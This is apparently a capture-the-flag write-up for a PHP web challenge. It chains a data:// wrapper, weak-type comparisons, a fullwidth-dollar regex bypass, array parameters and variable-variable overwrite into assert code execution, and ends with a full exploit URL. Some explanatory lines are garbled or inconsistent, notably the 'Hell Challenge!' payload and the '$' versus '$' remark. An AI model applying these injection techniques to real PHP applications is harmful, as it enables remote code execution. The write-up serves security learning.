Rating: 4.7

After access this site, we will see source code here, we can know this is a typical PHP trick challenge.

## Part One: PHP Wrapper

```php
@$msg = $_GET['msg'];
if(@file_get_contents($msg)!=="Hello Challenge!"){
die('Wow so rude!!!!1');
}
```

At first, we need to find an input which satisfies the above conditions. In here, we need PHP wrapper.

PHP can read something like ``php://input`` / ``data://text/plain;xxx`` and some other things as file.

For example, ``file_get_contents("data://text/plain,Hell Challenge!")`` will return ``Hello Challenge!`` here, so we can solve this part by use ``data://text/plain,Hell Challenge!`` as payload.

## Part Two: Weak Type

```php
@$k1=$_GET['key1'];
@$k2=$_GET['key2'];

$cc = 1337;$bb = 42;

if(intval($k1) !== $cc || $k1 === $cc){
die("lol no\n");
}
```

After that, we need to find a k1 which ``intval($k1) == $cc`` and ``$k1 !== $cc``, this is easy, when we post some thing, PHP will use it as string, so ``1337`` is enough here.

## Part Three: UTF8

```php
if(strlen($k2) == $bb){
if(preg_match('/^\d+$/', $k2) && !is_numeric($k2)){
if($k2 == $cc){
@$cc = $_GET['cc'];
}
}
}
```

At first glance, we need to find a k2 which only have digit here, but is not number by PHP's ``is_numeric`` function. But this challenge use ``$`` rather than ``$``, so ``000000000000000000000000000000000001337$`` would be cool.

## Part Four: Variable Coverage

```php
if(substr($cc, $bb) === sha1($cc)){
foreach ($_GET as $lel => $hack){
$$lel = $hack;
}
}
```

In PHP, you can use ``$$`` to get a dynamic variable. For example:

```php
$b = true;
$a = 'b';
$$a = false;
var_dump($b); // false here
```

Therefore we can change some variable here. However, we need bypass this check ``substr($cc, $bb) === sha1($cc)`` first. We need another PHP trick here. When we post an array, ``substr`` / ``sha1`` will return ``NULL`` but not throw error here, so send ``cc[]=1`` will bypass this check.

## Part Five: Evil Assert

After satisfying the above conditions, we found that the code to print the flag was commented. But it doesn't matter, we have ``assert`` here! Assert will execute the string passed in, and we can control all variable with variable coverage part.

Finally, our payload is ``https://arcade.fluxfingers.net:1819/?bb=print_r%28%24flag%29%3B%2F%2F&key2=000000000000000000000000000000000001337%EF%BC%84&key1=1337&k1=2&cc%5B%5D=&msg=data%3A%2F%2Ftext%2Fplain%2CHello+Challenge%21``.